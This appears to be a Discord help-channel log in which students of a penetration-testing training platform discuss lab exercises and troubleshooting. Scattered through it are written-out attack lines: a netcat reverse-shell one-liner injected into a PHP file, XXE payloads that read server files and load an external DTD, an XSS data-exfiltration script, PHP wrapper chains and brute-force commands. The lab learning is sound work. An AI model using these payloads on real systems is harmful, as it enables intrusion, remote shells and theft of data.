#modules

1 messages ยท Page 327 of 1

bright pivot
#

Why is my output so messy?

image.png
#

is there anything wrong with my command?

autumn pilot
#

the wrapping of the results of ffuf depends on the size of the terminal, e.g., the progress

dusty widget
#

hello

winged egret
#

Hello guys, in the Server SIde Attacks - SKills Assessment we are provided with a username and password ... Has anyone used an approach involving those credentials to get the flag ? Because I already got the flag with 2 approaches so I wonder if there's a third one I haven't thought of

fathom pendant
cloud urchin
#

fullscreen or maximized?

fathom pendant
#

Maximized

#

Ig if you wanna be pedantic

cloud urchin
#

i don't recall that issue maximized or when it's a smaller window but i don't usually use a smaller window

fathom pendant
#

Ffuf does weird stuff on smaller windows

safe star
#

For me that only happens on the parrot terminal

cloud urchin
#

yeah i use kali and haven't seen that, but maverick is also using kali

safe star
#

Oh I didnโ€™t even see the picture ๐Ÿคฃ

#

Yeah idk about that

thin kelp
#

sorry why I can't access the general?

storm elk
glad frost
#

Hello everyone, I've been working on the "Injection Attacks" skills assessment. I managed to discover the initial vulnerability but can't find the internal web application (even though I discovered an IP address). Any nudges are appreciated.

fickle topaz
#

hey guys
quick question
for module password attack under Pass the Ticket (PtT) from Linux

#

I having been trying to login to the shares using smbclient but its return error

fathom pendant
#

Sometimes this one is tricky on vms, did you try connecting via netcat

fathom pendant
fickle topaz
stable sparrow
fathom pendant
#

For some reason that one is dumb for vms

stable sparrow
safe star
#

@stable sparrow have u tried udp?

fathom pendant
safe star
#

yes

#

just tested

rustic sage
#

-sU ๐Ÿ˜ฎ

fathom pendant
#

Deleting bc spoiler post anyway

stable sparrow
fathom pendant
stable sparrow
fathom pendant
#

Same thing

safe star
stable sparrow
#

alr then yes

fathom pendant
#

A lot of the s[Y] commands can be combined

stable sparrow
#

i will try on a pwnbox

fathom pendant
#

Make sure to turn off your vpn first

safe star
#

there is only one version

stable sparrow
fathom pendant
stable sparrow
#

which seems like the real version of the server
but i have reserves about this being the expected flag

fathom pendant
#

It's not

safe star
#

i cant even get a version ๐Ÿ˜ญ

fathom pendant
#

The expected value is HTB{..}

safe star
#

just says filtered on tcp

fathom pendant
#

This is the medium lab

#

For nmap module

stable sparrow
#

it effectively worked on the pwnbox on the first try with the most brain dead nmap command

fathom pendant
#

Ye

#

Idk why this happens

#

ยฏ_(ใƒ„)_/ยฏ

stable sparrow
stable sparrow
limber river
fathom pendant
fathom pendant
#

Copy/paste

limber river
fathom pendant
#

It's just a thing that happens for some dumb reason

stable sparrow
oak kernel
#

Hm I'm having an issue with XSS / Session Hijacking .. it downloads my script.js but it doesn't seem to get executed ๐Ÿค”

safe star
#

i dont think it will, but u can just add the script.js payload instead

#

same result

oak kernel
#

Yeah I guess, but the same result in my case means that it doesn't work either ๐Ÿ˜› ..looking at the solution, it says it should work. Maybe it's broken somehow. (or maybe the solution under "show solution" is outdated)

safe star
#

worked fine for me

#

did u prepend anything like a " for the script?

oak kernel
#

Hmm you mean in the XSS payload in the input field? If so, yes. ๐Ÿ™‚ I get the request for script.js in the php access log output;
[Sat Sep 14 16:02:28 2024] 10.129.98.209:36192 [200]: GET /script.js
... But then nothing more ๐Ÿ˜ฆ And script.js contains new Image().src='http://<ip>:<port>/[...]; .. but I don't get that request for some reason

fathom pendant
umbral spade
#

I only get 4 ports which none of them are ftp

fathom pendant
umbral spade
fathom pendant
#

Also sometimes you need to respawn a box a few times to get it to show

#

For w/e reason it doesn't always load

umbral spade
#

I'll try that now

oak kernel
safe star
fathom pendant
umbral spade
safe star
#

yeah that machine is laggy

safe star
chilly prawn
#

lit

oak kernel
fathom pendant
#

Oof

frozen sage
#

Fuck rude people

fathom pendant
#

I'd rather not

rustic sage
#

Section: SIEM Visualization Example 2: Failed Logon Attempts (Disabled Users)
Module: Security Monitoring & SIEM Fundamentals

image.png
#

Can't seem to find where the document would be

sly trench
#

Why cant I verify from my phone?

acoustic owl
orchid monolith
#

Hi , I have been stuck about one module "Advanced XSS and CSRF Exploitation " "XSS Filter Bypasses", Where Can I ask it the question? Please give me the recommendation, thank you.

cloud urchin
#

in this channel

orchid monolith
#

thank you!

#

In the lab end, I see the content:

Note: Due to the way the admin user accesses the page, please make sure not to use any port in URLs in your payload, i.e., use http://exfiltrate.htb/ instead of http://exfiltrate.htb:PORT/.
about this sentence, I don't understand it because when configure vhost like example below:

I add file hosts like below:
94.237.59.199 vulnerablesite.htb exploitserver.htb exfiltrate.htb
then I only can access with http://exfiltrate.htb:PORT/log
so How can I access http://exfiltrate.htb/log to see the victim page?

cloud urchin
#

use the port

#

its talking about dont include the port in your payload to the victim, not you navigating to it yourself

#

you should delete that script

#

all it says is don't use the port in the payload. obviously you still need to use the port in your own browser to view the log.

orchid monolith
#

my question is payload will use port 80 when submit to victim but viewing the log is we are using using another port so How to see log when two ports are different?this is not very logical

#

if i submit payload to port 80 then i also have to view log at port 80.

acoustic owl
#

I'm not entirely sure, but I think it's because of the way the lab is set up (Docker) Inside the container, the servers run on port 80, but you can only access the container from โ€œoutsideโ€ and are therefore dependent on port mapping.

#

While the internal process can access port 80 directly, you can only access port 80 internally from the outside via port forwarding.

orchid monolith
#

thanks for good comment, I am not thinking about this situation.

acoustic owl
#

I guess it is something like this
docker run -p 12345:80 httpd

orchid monolith
#

I think so

river marsh
#

when it comes to the student program am i charged at the start of every month or a month after subscribing?

orchid monolith
#

Hi , I tried so many time, not using Port like the topic requries but don't get any the request from victims, If anyone passed please recommend for this lab Advanced XSS and CSRF Exploitation " "XSS Filter Bypasses".

cloud urchin
#

probably your payload then

#

the section is about bypassing filters, so you have to try the ways it teaches till you get a bypass

vagrant osprey
#

I've tried google, but I don't understand how people are explaining it

eager ruin
#

Hello

storm elk
#

Hello

eager ruin
#

I've been studying on the platform for a while but from time to time I see how some command syntax with the paragraphs look a bit very stuck and they tend to confuse if they could fix that little detail so that the command looks clearly well or a success.

storm elk
vagrant osprey
cloud urchin
cloud urchin
vagrant osprey
sweet jewel
#

kerberos attacks - unconstrained delegation on users

./dnstool.py -u "inlanefreight.local\callum.dixon" -p "[redacted]" -r "gatari.inlanefreight.local" -d "10.10.14.2" --action add "10.129.205.35"

first time running shows that it was successful, but trying to validate with by running nslookup against the DC (10.129.205.35) shows that there are no records for gatari.inlanefreight.local

  • DC is able to resolve itself (dc01.inlanefreight.local)
  • Trying to add the DNS record again says that the record already exists, so I'm assuming it works

anyone know what's causing this issue? my assumption is caching, but I've waited 5 minutes and there's no change sadglas

edit: 10 mins later, the DNS cache updated and it works now~

dbd56726655b8e656fa8503bc2e6457c.png
vagrant osprey
cloud urchin
#

that's it. if python has the suid bit set then you can run that command to gain root. just like it says.

#

you can look at the gtfobins link i sent you to see common apps that can be abused if you have the suid bit set on them.

vagrant osprey
#

or do i just straight up run that cmd

safe star
#

the id is to verify that you escalated your privileges

cloud urchin
#

like i said.. if python has the suid bit set then you run that command to get root. another program will have a different command.

#

that's literally it.

#

the suid bit allows you to run an executable as the file owner

#

so if root owns python, you can use that to run a python command as root

#

that python command just spawns a bash shell

vagrant osprey
cloud urchin
#

and since you have the suid bit set, it runs as root the owner of python

#

look at the link i gave you it shows you exactly which one

#

"how to detect suid and gui for privilege escalation"

#

so on the box, you need to run the command that finds executables with the suid bit set, then abuse that executable

vagrant osprey
vagrant osprey
#

this sort of output?

image.png
fathom pendant
#

Just check what the usr can sudo

cloud urchin
#

yeah those are executables with the suid bit set, you can see the 's'

#

just because it's set doesn't mean it's abusable, that's when you use the other link i gave you the gtfobins link, that will show you how to abuse an executable to escalate privileges

fathom pendant
#

LinEnum spits out a bunch of unnecessary stuff for new people

cloud urchin
#

yeah that's for sure. i always start with sudo -l

fathom pendant
#

The answer is way simpler than suid abuse

vagrant osprey
fathom pendant
vagrant osprey
#

beautiful

fathom pendant
#

Use gtfobins to figure out what you can do

vagrant osprey
#

i read that first part and thought you were telling me to gtfo ๐Ÿ˜ญ will look into what that cmd does

fathom pendant
#

It's not a command

#

The website that SuperNuts linked earlier lol

vagrant osprey
#

yeah i found the website 20 sec after i said that ๐Ÿ˜ญ i'm not sure what to look for though, i searched sudo and it's not helpful

fathom pendant
#

Maybe the bin you can use with sudo

#

๐Ÿ™ƒ

#

Sudo isn't gonna be helpful on that site bc that's generally just a category for the listed program/bin

vagrant osprey
#

sudo /bin/sh?

fathom pendant
#

That's not the binary you can use with sudo

#

look at the output of sudo -l and you'll figure it out

#

You had it earlier btw

#

Your message was removed bc spoiler

rustic sage
#

I want to learn python..!!

fathom pendant
cloud urchin
#

that's a good one, i'd start with python crash course a hands-on project based introduction to programming if you're just starting out

fathom pendant
cloud urchin
#

that's cool. they're both great books. i'm trying to get into c/c++ now too, there's just too much to learn and so little time.

vagrant osprey
fathom pendant
#

Wtf is audi

#

What I meant by that is the output of sudo -l will tell you what to look for in gtfobins

marsh echo
#

hey everyone

next bronze
marsh echo
#

I've already found the flag but I wanted to try a reverse shell so it's not possible :/

full wagon
#

Information Gathering Web Edition - skills assessment.
Need a hand on the last two questions (the first three are done). I try different tools to try and crawl for e-mail address, also enumerate for any interesting files and folders (to find the answer for the last question), but the last two questions confuses me. don't want to put spoilers here, if not needed. What info would anyone want me to post, in order to get some guidance? (ie running finalrecon jjust throws errors). I have tried both with the parrot pwnbox, and with vpn from my kali.

sacred jacinth
#

its simple, but a lot of us overlooked it.

#

<@&861185840277487616>

full wagon
ember fern
sacred jacinth
sacred jacinth
stiff bone
#

Who can I contact for help with SA 1 on the Introduction to Windows Evasion Techniques module?

full wagon
# sacred jacinth precisely! perhaps try further enumeration on that sub?

Ok, now I ran various tools with various wordlists on that sub (the only sub I found while enumerating with large word lists) and I cannot find anything useful. So, I'll have to skip the last two questions and move on. Notice that it appears to be somewhat unstable also. Suddently no connection. Well,thanks for trying to push me in the right direction anyways.

sacred jacinth
rustic sage
#

Module=File inclusion
-----Section= Log poisoning

I have executed commands like id, ls /, everyone of them works, but when reading the flag file (gibberishcharachter.txt) through 'cat' command, it shows empty, any idea!?

rustic sage
full wagon
tired juniper
#

Hiii

analog dock
sacred jacinth
quiet trout
#

oh nvm

rustic sage
olive slate
#

Need some help on Injection Attacks > XPath - Blind Exploitation. I tried to exfiltrate the entire XML schema but couldn't getting anything other than

<accounts>
    <acc>
        <username>username</username>
        <password>password</password>
    </acc>
    <acc>
        <username>username</username>
        <password>password</password>
    </acc>
</accounts>

Not sure what did i miss.

#

Wait. I'm an idiot. I did it wrong..

old oasis
quiet trout
#

show us your complete POC with DTD if XXE

#

err wait that might not be allowed

olive slate
quiet trout
#

i dont think i have access to that

#

still open to try and help but i think we need some more info, without spoiling of course

#

@olive slate ^

#

oh nvm this is xpath ill be no help here

old oasis
bronze heron
#

Iโ€™m having trouble with the admin page assessment in the brute-force module on HTB Academy.

Iโ€™m using the following Hydra command:

hydra -l user -P /usr/share/seclists/Passwords/Default-Credentials/db2-betterdefaultpasslist.txt 83.136.255.40 -s 37527 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^ :H=Authorization: Basic dXNlcjpwYXNzd29ycg== :F=<form name=log-in"

Although this command generates many credentials, none are valid. Iโ€™m not looking for a solution, but could you provide a hint on what might be wrong? Your help would be greatly appreciated.

quiet trout
#

also i dont see the -t option in your hydra which might be causing you to get rate limited.

#

if i remember how it works correctly.

#

you might need to encapsulate your headers and any other directives in your command in quotes as well, this could be throwing off the processing of the entire cmd

bronze heron
quiet trout
#

also consider, as a sanity check, modifying your cmd to use the alternative http-post-form directive like http-post-form://target.com/admin/login.php:... just to remove any chance your use of a bare ip without scheme is being misinterpreted.

#

i dont like hydra because of these things.

#

but i guess we're stuck with it

#

@bronze heron ^

tender nimbus
#

Hey guys im stuck on the footprinting lab hard section of the footprinting module, when i do my scan i have this as result but i have no credentials, i treid different things to see if they are not other potential open ports by scanning from other source port, scanning more quitly but i found nothing any help?

image.png
sacred jacinth
tender nimbus
sacred jacinth
tender nimbus
sacred jacinth
#

what are the -s and -D flags?

sacred jacinth
#

always start small

#

when it comes to UDP

tender nimbus
sacred jacinth
#

your preference

quiet trout
marsh echo
quiet trout
#

oh right, thx

#

/me slaps forehead

#

wait, can you do that? i thought that was a diff filter?

#

is there a way to combine them? php://filter.../expect:// ?

#

or is it expect://filter ? sorry these php wrappers are new to me.

#

ill try both

marsh echo
#

no php://filter/read=convert.base64-encode/resource=expect://

#

and your order must be encoded in URL

quiet trout
#

oh i see i didnt realize you could ... string them along like that

marsh echo
#

me neither ahaha during the CPTS htb surprised me from module to module

quiet trout
#

rock on man, that was clutch

#

this module certainly should've mentioned that

marsh echo
#

well, the sad thing about modules is that sometimes they make you think with the elements they give you and I think that's pretty cool ahah

quiet trout
#

very true, just didnt like how this one played out ๐Ÿ˜›

marsh echo
#

I understand you ahah

nova ginkgo
#

can anyone help me pls

I connected htb academy account to discord but not given permissions for example I can't send images

sacred jacinth
unkempt rune
#

Im doing Web attacks on HTBA, Advanced file disclosure section.

I am hosting xxe.dtd file on web server.

My XXE payload is following:

||<!DOCTYPE email [ <!ENTITY % begin "<![CDATA["> <!ENTITY % file SYSTEM "file:///var/www/html/flag.php"> <!ENTITY % end "]]>"> <!ENTITY % xxe SYSTEM "http://10.10.XX.XX:8000/xxe.dtd"> %xxe; ]>||

Im intercepting payload, and pointing to &joined; as its said in module.

I am getting 200 OK response but not content of file. File is accesses from vulnerable web app. Any idea what I am doing wrong?

SOLVED: File path was wrong

acoustic owl
pseudo kiln
#

is this the correct syntax to use Snaffler on a non-domain joined machine .\Snaffler.exe -s -o console ?

#

i could only find how to use it against a domain, but in the windows priv esc module they mention it for non domained joined machines too, but I cannot figure the syntax, it just hangs

#

nvm found it on github

image.png
regal thistle
#

i have enough cube but module is not unlock when i click on unlock please help me

acoustic owl
tender nimbus
#

hey guys quick question about pop3 and imap and their secured version, if i can connect to 1 of those the mails on the pop3 server will be the same then those on the pop3s server or is it possible that 1 have more messages?

quiet trout
limber river
tender nimbus
quiet trout
#

to check for more mail*?

tender nimbus
limber river
#

but each will be service at his own

tender nimbus
#

ow oke and can you help me with something im a little bit stuck rn

marsh echo
quiet trout
tender nimbus
#

so i found the community string of the snmp server and found some credentials for connecting to the mail servers, i found there an ssh key for tom and im know in but im stuck i have to find the user htb and his pass probably in a db but there is no db when i scan the target

quiet trout
#

its the same end result (pop3/pop3s) one is encrypted in communications the other is not

tender nimbus
quiet trout
#

oh i see you're working on lateral movement. have you checked uh whats it called... sudo users?

#

sudoers*

sacred jacinth
#

there is definitely a running service

#

database*

tender nimbus
quiet trout
#

you're ssh'd in as whats his name tho right?

tender nimbus
sacred jacinth
tender nimbus
sacred jacinth
#

it could be running locally?

#

try running ss -lntp

quiet trout
sacred jacinth
quiet trout
#

good to know i didnt know that

#

athere doesnt appear to be an htb user either

sacred jacinth
#

see any recognizable ports?

quiet trout
#

so its a login for a service and not for the box?

tender nimbus
quiet trout
#

the htb account

tender nimbus
sacred jacinth
quiet trout
#

we see a 33060 too, that looks interesting.

sacred jacinth
tender nimbus
#

i tried this but its not working

quiet trout
#

man mysql

sacred jacinth
#

its really simple

sacred jacinth
#

again, it's not exposed to the network

#

its running locally and you should delete those screenshots

#

they are spoilers

tender nimbus
#

okej im gonna try to find how to interact with it locally if im stuck im comming back ^^ thanks for you help

sacred jacinth
limber river
elder matrix
#

hey! i want to find something i found on bloodhound using powerview..
here's the scenario (names are fictional):

I got an ntlm hash for the user bob.
i found out that bob was in the "Network and Server Admins" domain group with this command:

Get-DomainUser -Identity bob

Using bloodhound, I easily found out that members of the "Network and Server Admins" group have local admin privileges on a machine called PWN03. Because of that, I was able to connect to PWN03 with psexec.py using bob's ntml hash.

What powerview command can i use to tell me that members of "Network and Server Admins" have local admin privileges on the PWN03 machine WITHOUT logging in as bob. Bloodhound found that info without being logged on as bob.

tender nimbus
leaden radish
#

Hi. I'm working through the module with gobuster, where the goal is to brute force virtual hosts on a target system (inlanefreight.htb). First, I assigned the IP in the "hosts" file via the following command: sudo sh -c "echo '94.237.59.63 inlanefreight.htb' >> /etc/hosts" I pinged "inlanefreight.htb" and it's reachable. Second, I typed the following: gobuster vhost -u http://inlanefreight.htb:37340 -w /home/laptop/SecLists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain But I keep on receiving two errors: "Wordlist (-w): must be specified ( use '-w'- for stdin)" and "Url/Domain (-u): Must be specified)" I've checked the solution and this should work. Any suggestions? Thanks in advance

acoustic owl
#

Have you copied the command?
The - may be incorrect. Write the command by hand without copying it.

tender nimbus
#

@sacred jacinth @limber river pwned ^^ that was a tricky one thanks for you help guys ๐Ÿ™‚

leaden radish
short trellis
#

Does anyone have insight on how to statically link the correct version of GLIBC so I can complete the sudo 0-day section in linux priv esc section, since there is no reference of how to do that in the lab materials?

nova ginkgo
#

pls help I guys I can't solve :Skills Assessment - File Upload Attacks

can anyone help me

unkempt rune
#

In the Attacking Web - Final Assesment I cant cat the file:

I enumerated admin, reset his password, logged in, found XXE in event page, but I cant output file for the fk sake. My payload is:

||```<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=/flag.php">
]>
<root>
<name>&company;</name>
<details>test</details>
<date>2024-12-22</date>
</root>


I tried both ||`/flag.php`|| AND ||`flag.php`||
safe star
hollow ibex
safe star
unkempt rune
#

I solved that in the end

normal sand
#

How do I tell if the Linux host I'm on is joined to Active Directory?

sacred jacinth
#

Is the OpenVAS skill assessment working for anyone else?

#

I can't seem to access the portal nor does the target machine have any gvm-start command.

safe star
normal sand
novel parrot
#

can someone help me out with command injection skill assesment?

left egret
#

Hello, Can anyone help me with "Web Service & API Attacks > Information Disclosure (with a twist of SQLi) > Identify the username of the user that has a position of 736373 through SQLi" ? I tried :

||ffuf -w "/usr/share/seclists/Fuzzing/6-digits-000000-999999.txt" -u "http://:3003$TARGET/?id=FUZZ" -fs 2||

but any id with the position of 736373 appears. Any tips ?

safe star
novel parrot
#

i think i foundm smthing thank you thou

rustic sage
#

also saying "network unreachable" and then never works

rustic sage
lusty hare
# rustic sage

do a ping on the host and let that run for some time and see if there's some packets are dropping

rustic sage
#

looks fine to me

lusty hare
#

also to make very sure if your "network" setup or the third party router is not causing any issue, i'd say try sharing your cellular data and re-do your connection

rustic sage
#

it just hit 1.4k then dropped to 448

rustic sage
#

so i had no choice but to use a third party so i can prevent ddos attacks on a game im ip db breached on

#

it's averaging 80ms

lusty hare
#

try connecting from somewhere else to make sure 100%, if you cant use PWNBOX to confirm if its an actuall issue, because its very unlickly that its an xfreerdp problem, if its does then contact the support 10% the chance could be the lab being unstable

rustic sage
lusty hare
rustic sage
#

i put it on the lowest ms and recommended one for ovpn

#

and it's still doing some issues

lusty hare
#

i dont think its openvpn problem neither i start to geuss its your WAN setup

rustic sage
#

ah

lusty hare
#

again to confirm this use pwnbox

rustic sage
#

yeah i'll use pwnbox instead thern

#

what the heck my ip died on htb i had like 100mins left

#

@lusty hare even on pwnbox

image.png
safe star
rustic sage
#

it's a fresh machine

#

i put it a timeout for 99999 on it also

lusty hare
rustic sage
#

yeah cause i've been trying the entire day to do this one question

safe star
#

yeah, the machine might just be slow

rustic sage
#

like it's not even that hard too

image.png
#

ik where to exactly go for this answer i just cant even get the damn exe name at this rate

safe star
short trellis
#

Can someone help? im getting this error while doing the sudo 0-day section in linux priv esc:
./sudo-hax-me-a-sandwich: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./sudo-hax-me-a-sandwich) . I have read you have to statically link in the Makefile but I do not see any examples on how to do that.

fathom pendant
#

Add a dash between

zealous trench
fathom pendant
#

Also the target has at least gcc installed

#

Idk about any other compiling tools

short trellis
fathom pendant
#

That wasn't what I was meaning lol

#

I meant I used a diff exploit

dim wolf
#

please don't post spoilers for modules above Tier 0

short trellis
fathom pendant
dim wolf
#

yes

#

Penetration Testing Process is Tier I

fathom pendant
#

Huh

rustic sage
#

Some staff member please fix the xfreerdp machines, on pwnbox also. It's not working I cannot do 1 god damn question on hackthebox

#

i wasted my entire day not being able to do 1 question that'll take less than a minuyte to do

dim wolf
#

have you tried remmina?

rustic sage
#

yes and it done the same thing to me

#

i dont know what to do pwnbox was fine yesterdayu

#

and xfreerdp was fine at a point and now it's just breaking everyutime

#

i've reset the machines like 20 times

dim wolf
#

does the module give you those creds?

rustic sage
#

yes

fathom pendant
#

Support doesn't monitor the discord

dim wolf
#

i'd also explain your internet connection setup since it's a bit unordinary

rustic sage
#

so i can be wired from downstairs, i do not have a wireless connection capability on my pc

#

and im on a vpn with mullvad

fathom pendant
#

Shouldn't matter for the pwnbox

rustic sage
#

yeah exactly

fathom pendant
#

Since that's through the browser

rustic sage
#

it's working like a normal internet

dim wolf
#

oh right you're using pwnbox

fathom pendant
#

My only suggestion is changing vpn regions

rustic sage
#

protocol tcp 443

fathom pendant
#

That's pwnbox region

#

Not vpn region

rustic sage
#

yes but shouldnt that not matter though if im using the lowest ms with the pwnbox?

fathom pendant
#

Vpn region also affects target spawns

rustic sage
#

okay switching to the 2nd fastes region

fathom pendant
#

2nd fastest?

#

Dude I'm not talking about pwnbox region

rustic sage
#

yes i know

#

there was another one with it being lower than the ms i was using

#

for pwnbox

fathom pendant
#

I'm talking about us/EU academy x vpn region

#

Those don't display any ms/info

#

Aside from load

#

No

rustic sage
fathom pendant
rustic sage
#

i meant this

#

oh right, ok so shall i swich to the 6th one?

fathom pendant
#

Just any one

rustic sage
#

okay

ashen pollen
rustic sage
#

same stuff

rustic sage
# fathom pendant Just any one

i figured something with my internet speed, i have that third party router, my devices are routed to 5G networking instead of 2.4, every device is being given atleast 270mbps where as my pc is only recieving 60mbps

#

no idea how to route my pc to 5g networking on the router

fathom pendant
#

If it's pwnbox it won't generally matter

#

Considering it's the pwnbox connection to the target

#

Reach out to support

autumn pilot
#

Also a good practice is to keep a single connection to the VPN, e.g., if you have the VPN running in a local VM and then decide to use the workstation (pwnbox) you must disconnect from the VPN on the local VM

hasty solar
#

do you mind if i dm you with a quick question using SAMLRaider in that exercise?

digital crown
#

why is ssrf so low rated?

fathom pendant
#

Try not to post potential spoilers

shut quest
#

Wrapping code in a code block like so ``` makes life easier to help, and it's gone.

nova ginkgo
rustic sage
#

how do i prevent my kali linux doing this everytime

image.png
fathom pendant
# nova ginkgo how can i

Just the first and last few characters can help others determine if something looks right or not

nova ginkgo
rustic sage
fathom pendant
#

Also idk if the module taught you about $IFS yet

nova ginkgo
fathom pendant
rustic sage
#

but it does this everytime i boot

rustic sage
fathom pendant
rustic sage
#

i rather just like not have this issue at all

fathom pendant
#

${IFS}

nova ginkgo
fathom pendant
rustic sage
fathom pendant
#

Putting behind spoiler commands does nothing

#

I don't recall too many issues with this section

nova ginkgo
#

thanks but I don't understand )

fathom pendant
vagrant osprey
#

Getting Started --> Knowledge Check
https://academy.hackthebox.com/module/77/section/859

I couldn't figure it out yesterday, so I'm trying again today. When i run the file that can be executed without root permissions, I'm unable to escalate privilege. Could someone please guide me through why I'm doing this wrong? I think my error lies somewhere within these steps:

REVERSE SHELL
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.27 4444 >/tmp/f' | tee -a template.php

BOX TERMINAL
nc -lvnp 4444

REVERSE SHELL
sudo php

HTB Academy : Cybersecurity Training

Login to HTB Academy and continue levelling up your cybsersecurity skills.

fathom pendant
fathom pendant
#

Also sudo <command you can sudo>

fathom pendant
#

You can't just run sudo <command> gtfo bins gives you steps

vagrant osprey
fathom pendant
vagrant osprey
fathom pendant
#

<@&861185840277487616>

rugged turtle
#

Hi guys, I'm having a lot of issues in trying to solve the latest lab of Password Attacks - Hard.
I'm basically at the end, mounted the drive, got the hash. For a while I wanted to try decrypting them then after a few tries I've realized the smartest choice might be to simply PtH. However, there's no way to let it work because every option WinRM / SMB / RDP / Invoke-TheHash tells me that the hash is incorrect.
At this point, I've come to understand that maybe the issue is due to a corrupted mounting of the drive...because I ca'n't think of anything else. Did anyone fell into this ? How did you get out?

nova ginkgo
fathom pendant
vagrant osprey
fathom pendant
#

Though you may need to disable restricted admin

fathom pendant
#

You can't modify the binary here

vagrant osprey
#

so i need to modify php or no

fathom pendant
#

Gtfobins has the solution

fathom pendant
fathom pendant
vagrant osprey
fathom pendant
#

Dude

vagrant osprey
fathom pendant
#

For fucks sake

#

You just type the name of the command you can use with sudo

#

I.e. openssl

#

It's that simple

vagrant osprey
vagrant osprey
fathom pendant
foggy monolith
#

Blank nmap scan report for the "Web Server Pivoting with Rpivot" section of the Pivoting and Port Forwarding module. What am I doing wrong here?

๐Ÿ“Ž pivoting-linuxpiv.html
fathom pendant
vagrant osprey
prisma canyon
#

Guys I've started the "Using web proxies" module and I've been trying to get the ZAP working for the past 5 hours, reading the guide again and again, starting new instances and I just can't get it to work. When I'm trying to open any website I just get a message "connection timed out". I have no idea what I'm doing wrong

fathom pendant
#

sudo x

vagrant osprey
#

right but i have no idea what that command is supposed to be

fathom pendant
fathom pendant
#

It's the p..

foggy monolith
fathom pendant
#

Yes @vagrant osprey

foggy monolith
#

Notice nothing there โ€• non-standard port?

#

proxychains nmap -p80,443 -sCV -v -Pn -n --disable-arp-ping -T5 --max-retries=0 --open -oX - 172.16.5.0/23 | xsltproc -o pivoting-linuxpiv.html -

#

Not sure why that's returning nothing. Again, Rpivot section.

#

Anyone?

cloud urchin
#

looks like you're trying way too much, why not just follow what the module does?

foggy monolith
#

Adding additional ports to see if that makes a difference.

rugged turtle
# fathom pendant You can xfreerdp with the hash

I tried, doesn't work. Precisely it tells me STATUS_LOGON_FAILURE. As ifthe hash is incorrect, I suppose. The point is, I've obtained this hashes from samrdump2 from the SAM / SYSTEM files contained in the vhd.
So at this point I'm literally lost

fathom pendant
rugged turtle
fathom pendant
#

Also the hash isn't the full a:b

#

It's just the b part (which is the nt hash)

foggy monolith
rugged turtle
#

winrm says Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

#

I assume it could be related to RestrictedLocalAdmin (?)

fathom pendant
cloud urchin
fathom pendant
#

Ntlm hashes are presented as lm:nt

foggy monolith
fathom pendant
cloud urchin
rustic sage
#

doesn't tell me anything for the executable

image.png image.png
cloud urchin
#

they don't make this difficult, it's the IP in the section

rustic sage
#

i search for the T_W__.exe and it doesn't exist there for me

fathom pendant
rugged turtle
fathom pendant
#

It's not gonna be directly in the 4624 event, you're gonna follow the trail to where the login leads

fathom pendant
rustic sage
#

Oh that makes much more sense give me a second

fathom pendant
rugged turtle
fathom pendant
#

Gimme a quick moment

fathom pendant
#

:)

#

The hash still being that b portion

rugged turtle
#

sooooo, I suppose I messed up with the -m option

fathom pendant
#

1000 should work if you just supply it with the b portion

#

I keep the example hashes page on standby just in case

rugged turtle
fathom pendant
#

Well it is talking about the hashes

#

The hashes aren't in a format that hashcat likes

rugged turtle
#

Hashfile 'mut_password.list' on line 94041 (yellow99): Token length exception
But the error seems to refer to the list, isn't it

fathom pendant
rugged turtle
#

hashcat -m 1000 mut_password.list adm_ntlmhash.txt

fathom pendant
#

Ah

#

That's ehy

#

You put the hash/file first

#

Not the wordlist

foggy monolith
fathom pendant
foggy monolith
fathom pendant
#

Eh moving through pivots is generally slow

rugged turtle
fathom pendant
#

It shouldn't take long to crack tbqh

fathom pendant
rugged turtle
fathom pendant
#

You get used to it

#

Or forget then immediately remember after hitting enter

rugged turtle
fathom pendant
#

I can tell you I've had my fair share of forgetting -u (for commands needing a url) or forgetting to specify http://

rugged turtle
#

-U -l/-L -u

rugged turtle
fathom pendant
#

It is enough

#

To get the hash cracked

rugged turtle
#

Hm, interesting

fathom pendant
#

If you supplied it with multiple hashes it'll take longer but it should output whenever it cracks one

rugged turtle
#

I have no clue wth happened, I also tried to recompose the dump of SAM / SYSTEM with samrdump2, but nothing changed

fathom pendant
#

also

#

instead of specifying a user@target you just specify local after also telling it where the SAM/SYSTEM files are :)

#

no need for any samrdump or other tools

#

i believe you can also specify --just-ntlm or something like that

#

nvm that's for ntds files

rugged turtle
#

let me make a couple of tries

fathom pendant
#

big oof

rugged turtle
#

.......

#

god had some evil plan for me this weekend

#

Thanks a lot @fathom pendant, the only way I could come out from this dead end was to redo everything unbiased from the beginning

fathom pendant
#

your approach to the situation was valid though

#

so don't completely count yourself out

#

you found (what you assumed to be) the right hash; you attempted pth techniques, unsuccessfully, you then attempted to crack (what you assumed) were the right hashes to get a password

#

you had 0 way of knowing without attempting other tools that the hashes that the one tool gave you were incorrect

rugged turtle
#

yea, indeed, this also sets some boundaries at the same time. Especially at the beginning it's better not to venture too far. I got baited away from the vhd mounting part which wasn't directly explained in the chapter. That led me into venturing away from the usual. I must also admit that I've tried impacket-secretsdump but I'm quite sure I messed up the command and given up to it. I definitely need to pay more attention to the commands

median moat
#

Hi Iโ€™m new. I want to start learning cybersecurity from hack the box. I know Iโ€™m in college for a different major, but right now I want to learn as most as I can.

#

What is modules for? Right now I am in the big bounty hunter track, but any pointers to get started learning?

shut vapor
nova ginkgo
tender nimbus
#

Hey guys dumb question but i have a lot of notes, do you think for like protocols and services its ussfull to make a how it works section?

#

or should my notes be short and comprhensive?

wintry gorge
#

Can anyone give some help on the "windows lateral movement" module?

ocean night
#

@topaz dagger which CTF?

median moat
topaz dagger
fathom pendant
#

AEN isn't really a ctf

#

it's an academy module

#

second it's heavily recommended to do it blind, meaning no reading the module aside from the 2 pages of overview then just launching the target and going for domain compromise

tender nimbus
fathom pendant
#

tbh that's completely up to you if you want to write a quick blurb of 'DNS resolves hostnames to ips' or do a deeper explanation is up to you

weak dagger
#

What is the best practice for the CBBH exam after finishing all the modules ?

#

Like are there certain machines or a list to practice ?

rustic sage
#

might need help with this, i can't seem to figure it out

cloud urchin
#

instead of posting a picture of the question, say the module and section and say what you're stuck on

rustic sage
#

